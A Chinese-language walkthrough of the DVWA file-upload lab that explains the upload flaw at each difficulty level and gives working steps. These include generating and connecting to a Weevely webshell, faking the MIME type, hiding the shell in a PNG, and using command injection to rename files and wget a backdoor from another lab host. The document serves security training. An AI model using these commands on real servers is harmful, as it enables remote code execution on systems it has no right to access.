DVWA File Upload实验
正常功能
实现图片上传或者正常的附件上传到服务器
Low难度
代码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>服务器没有对上传文件做任何限制,因此这里可以直接上传webshell
使用Weevely制作webshell
除了使用简单的php一句话木马
还可以配合Weevely进行后门的生成
weevely generate FancyPig file_inclusion.php
上传该文件
使用Weevely连接服务器
使用weevely进行连接
weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig这里已经以www用户身份连接到了服务器,可以输入shell命令
Medium难度
代码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>从上述代码可以看到,该代码对上传文件的类型及大小做了相关限制,限制了mime类型必须是jpeg或者png,且大小不能超过100000B
修改文件类型
将之前Weevely生成的文件修改类型为png
然后上传时进行抓包,这里可以看到类型是png的
我们可以通过修改上面文件名称的.png为.php进行上传
提示上传成功了
连接服务器
使用weevely进行连接
weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig这里已经以www用户身份连接到了服务器,可以输入shell命令
High难度
代码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>之前的Medium难度的代码有漏洞是因为使用 content-type 去判断文件类型,上述代码通过文件扩展名进行判断,这样就很难通过burpsuite上传php文件了。
这时候我们就需要借助DVWA里其他的漏洞,比方说借用Command Injection的漏洞进行文件名修改,将上传的文件后缀修改成.php的
思路1:截取很小的图片进行合成然后使用Cknife连接
创建图片并合成
这里截取了一个很小很小的图片(小的跟一个像素块一样)
然后进行合成
上传
利用Command Injection修改文件类型
ping 127.0.0.1 |mv ../../hackable/uploads/test.png ../../hackable/uploads/test.php
然后用Cknife连接,进行连接,发现能够连接
思路2:截取很小的图片进行合成然后使用Weevely连接
创建图片并合成
weevely generate FancyPig test.php
cat screenshot.png test.php >> test2.png
上传成功
利用Command Injection修改文件类型
ping 127.0.0.1 |mv ../../hackable/uploads/test2.png ../../hackable/uploads/test2.php
使用Weevely连接
weevely http://192.168.47.129/dvwa/hackable/uploads/test2.php FancyPig
思路3:通过Command Injection上传后门文件
下载test.txt文件
ping 127.0.0.1 |wget http://192.168.47.128/test/test.txt
验证发现已经成功上传
将test.txt文件修改为test.php文件
ping 127.0.0.1 |mv test.txt test.php
验证发现已经成功修改
使用Weevely进行连接
weevely http://192.168.47.129/dvwa/vulnerabilities/exec/test.php FancyPig
© 版权声明
THE END
暂无评论内容